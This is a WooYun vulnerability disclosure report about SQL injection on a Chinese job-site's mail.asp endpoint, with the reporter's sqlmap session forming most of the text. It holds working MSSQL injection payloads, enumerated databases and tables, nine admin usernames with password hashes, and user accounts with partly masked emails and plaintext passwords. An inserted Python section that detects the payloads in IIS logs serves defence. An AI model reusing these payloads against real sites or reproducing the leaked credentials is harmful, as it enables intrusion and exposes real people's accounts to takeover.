WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops article reader--------http://drop.zone.ci/
2015-09-17: Details have been reported to the vendor and are awaiting handling
2015-09-19: CNCERT (National Internet Emergency Center) has not yet been able to reach the relevant unit; details are disclosed only to the notification agency
2015-09-29: Details disclosed to core white hats and experts in the relevant field
2015-10-09: Details disclosed to regular white hats
2015-10-19: Details disclosed to intern white hats
2015-11-03: Details disclosed to the public
SQL injection on the Haorencai (好人才网) main site leaks about 130,000 (13W) user registration records (DBA privileges)
Injection point: http://**.**.**.**/ajax/mail.asp?mail=
Testing showed the application runs with DBA privileges.... so I just ran SQLMAP against it.... and found roughly 130,000 (13W) registered users.

Database: haorencai
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| dbo.hrc_all_user | 130987  |
+------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mail
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mail=' AND 5701=5701 AND 'nMdb'='nMdb

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: mail=' AND 6100=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(110)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6100=6100) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(104)+CHAR(114)+CHAR(58))) AND 'moZm'='moZm

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: mail='; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: mail=' WAITFOR DELAY '0:0:5'--
---
[19:56:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[19:56:39] [INFO] fetching database names
[19:56:40] [INFO] heuristics detected web page charset 'GB2312'
[19:56:40] [INFO] the SQL query used returns 13 entries
available databases [13]:
[*] 1tian1ge
[*] hanshan-oa
[*] haorencai
[*] haorencai-20110809
[*] hsd-v2
[*] htj-oa
[*] hxa_oa
[*] korea_hospital
[*] master
[*] model
[*] msdb
[*] oa-yt
[*] tempdb

current database: 'haorencai'
current user: 'haorencai-db'

Database: haorencai
[45 tables]
+-------------------------------+
| haorencai-db.hrc_pos_view     |
| haorencai-db.hrc_store_resume |
| dtproperties                  |
| hrc_ad_company                |
| hrc_ad_personal               |
| hrc_ad_phone                  |
| hrc_adv                       |
| hrc_advice                    |
| hrc_all_user                  |
| hrc_area                      |
| hrc_career_keyword            |
| hrc_collect_position          |
| hrc_collect_resume            |
| hrc_com_base                  |
| hrc_com_pay                   |
| hrc_com_position              |
| hrc_comment                   |
| hrc_document                  |
| hrc_job_keyword               |
| hrc_link                      |
| hrc_manage                    |
| hrc_messenger                 |
| hrc_notice                    |
| hrc_per_base                  |
| hrc_per_cert                  |
| hrc_per_disp                  |
| hrc_per_edus                  |
| hrc_per_exp                   |
| hrc_per_lang                  |
| hrc_per_pay                   |
| hrc_per_phone                 |
| hrc_per_train                 |
| hrc_quick_base                |
| hrc_quick_classify            |
| hrc_report                    |
| hrc_resume_visited            |
| hrc_send_resume               |
| hsd_attractions               |
| hsd_city                      |
| hsd_comment                   |
| hsd_driver                    |
| hsd_keyword                   |
| sungsin_job                   |
| sysconstraints                |
| syssegments                   |
+-------------------------------+
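The four techniques sqlmap lists above each leave a recognisable shape in the web server's request log. As an added example (not part of the original report), the Python below classifies IIS W3C-extended log lines by those four signatures; the regexes, the log lines and the assumed field order (date time s-ip cs-method cs-uri-stem cs-uri-query ...) are all constructed here.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four techniques sqlmap reported against the mail=
# parameter (constructed regexes, not sqlmap's own).
PATTERNS = {
    "boolean-based blind": re.compile(r"'\s*AND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\d+\)", re.I),
    "stacked queries": re.compile(r";\s*WAITFOR\s+DELAY", re.I),
    "time-based blind": re.compile(r"WAITFOR\s+DELAY\s+'", re.I),
}


def classify(query_string):
    """Return the technique names found in the URL-decoded query string."""
    decoded = unquote_plus(query_string)
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    # A stacked WAITFOR also matches the time-based regex; keep only the
    # more specific stacked-queries label.
    if "stacked queries" in hits:
        hits = [h for h in hits if h != "time-based blind"]
    return hits


def scan_iis_log(lines):
    """Walk W3C extended IIS log lines (assumed field order: date time s-ip
    cs-method cs-uri-stem cs-uri-query ...) and return (uri_stem, techniques)
    for every request that matched a signature."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # skip blanks and #Fields/#Software directives
        fields = line.split()
        if len(fields) < 6:
            continue
        stem, query = fields[4], fields[5]
        techniques = classify(query)
        if techniques:
            findings.append((stem, techniques))
    return findings


# Constructed sample log; the payloads echo the ones sqlmap printed above.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip
2015-09-17 19:56:39 10.0.0.5 GET /ajax/mail.asp mail=test%40example.com 10.0.0.9
2015-09-17 19:56:39 10.0.0.5 GET /ajax/mail.asp mail='+AND+5701=5701+AND+'nMdb'='nMdb 10.0.0.9
2015-09-17 19:56:39 10.0.0.5 GET /ajax/mail.asp mail='+AND+6100=CONVERT(INT,(CHAR(58)%2BCHAR(105))) 10.0.0.9
2015-09-17 19:56:39 10.0.0.5 GET /ajax/mail.asp mail=';+WAITFOR+DELAY+'0:0:5'-- 10.0.0.9
2015-09-17 19:56:39 10.0.0.5 GET /ajax/mail.asp mail='+WAITFOR+DELAY+'0:0:5'-- 10.0.0.9
""".splitlines()
```

Running `scan_iis_log(SAMPLE_LOG)` flags the four probing requests and leaves the benign one alone; the `cs-uri-query` field must be present in the IIS logging configuration for this to work.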
Found that user passwords are stored in plaintext. Speechless. The admin accounts and passwords leaked as well....
Database: haorencai
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.hrc_messenger | 21388   |
+-------------------+---------+
[20:20:59] [INFO] retrieved: 82034
Database: haorencai
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dbo.hrc_ad_personal | 82034   |
+---------------------+---------+

130,000 registered users' records, including account names, passwords, e-mail addresses and so on, and every one of them in plaintext. Speechless....

Database: haorencai
Table: hrc_all_user
[12 columns]
+-------------+---------------+
| Column      | Type          |
+-------------+---------------+
| acceptEmail | bit           |
| add_date    | smalldatetime |
| autoid      | int           |
| from_do     | varchar       |
| log_hits    | smallint      |
| send_date   | smalldatetime |
| send_date2  | smalldatetime |
| up_date     | smalldatetime |
| user_id     | varchar       |
| user_mail   | varchar       |
| user_pass   | varchar       |
| user_type   | tinyint       |
+-------------+---------------+

Database: haorencai
Table: hrc_manage
[5 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| ad_name  | varchar |
| ad_pass  | varchar |
| ad_power | varchar |
| ad_role  | int     |
| id       | int     |
+----------+---------+

Database: haorencai
Table: hrc_manage
[9 entries]
+-----------+------------------+---------------------------+
| ad_name   | ad_pass          | ad_power                  |
+-----------+------------------+---------------------------+
| aileen    | cc2bdf6614f728e2 | 0,1,2,3,4,5,6,7,8         |
| apple42   | 90721aa2c76b2d48 | 0,1,2,3,4,5,6,7,8,9,11    |
| arch      | a5d420fbc2491416 | 0,1,2,3,4,5,6,7,8,9,10,11 |
| chm726    | d01b294f3b53dd10 | 0,1,2,3,4,5,6,7,8,9,10,11 |
| clzheng   | cebc5cc990e471a0 | 0                         |
| happyds33 | aec399df03c6dde1 | 0,1,2,3,4,5,6,7,8,9,11    |
| jinsudo   | a8a22c569110997e | 0,1,2,3,4,5,6,7,8,9,10,11 |
| lishuo    | 9f413d19e73fc1cf | 0,1,2,3,4,5,6,8           |
| sff       | 3608acabbcaac14b | 0,1,2,3,4,5,6,11          |
+-----------+------------------+---------------------------+

Database: haorencai
Table: hrc_all_user
[13 entries]
+--------+------------+-----------------------------+------------+
| autoid | user_id    | user_mail                   | user_pass  |
+--------+------------+-----------------------------+------------+
| 100    | ab120      | tingting1984118@**.**.**.** | 1984118    |
| 1000   | limei1212  | limei-1212@**.**.**.**      | 9172002    |
| 10000  | weilin123  | weifei11@**.**.**.**        | 123123     |
| 100000 | youchenkst | zhuxiang0450@**.**.**.**    | 521025     |
| 100001 | 2浪神      | 272897483@**.**.**.**       | wkx1988210 |
| 100002 | wsszera    | 871934416@**.**.**.**       | 60551519   |
| 100003 | wsszeraa   | 469609582@**.**.**.**       | 60551519   |
| 100004 | woaimeng   | 1065607654@**.**.**.**      | 1524709312 |
| 100005 | qingti     | qingting52020@**.**.**.**   | 110110     |
| 100006 | danjie1    | 1481428961@**.**.**.**      | 269967557  |
| 100007 | wangyasong | 328436718@**.**.**.**       | 328436718  |
| 100008 | h7875234   | xiaohua80231314@**.**.**.** | 7875234    |
| 100009 | 1835240830 | 343827025@**.**.**.**       |            |
+--------+------------+-----------------------------+------------+
You're the professionals here...
Severity: High
Vulnerability Rank: 13
Confirmation time: 2015-09-19 18:30
CNVD confirmed the situation described and has notified the website's operating unit through the contact information published on the site.
None yet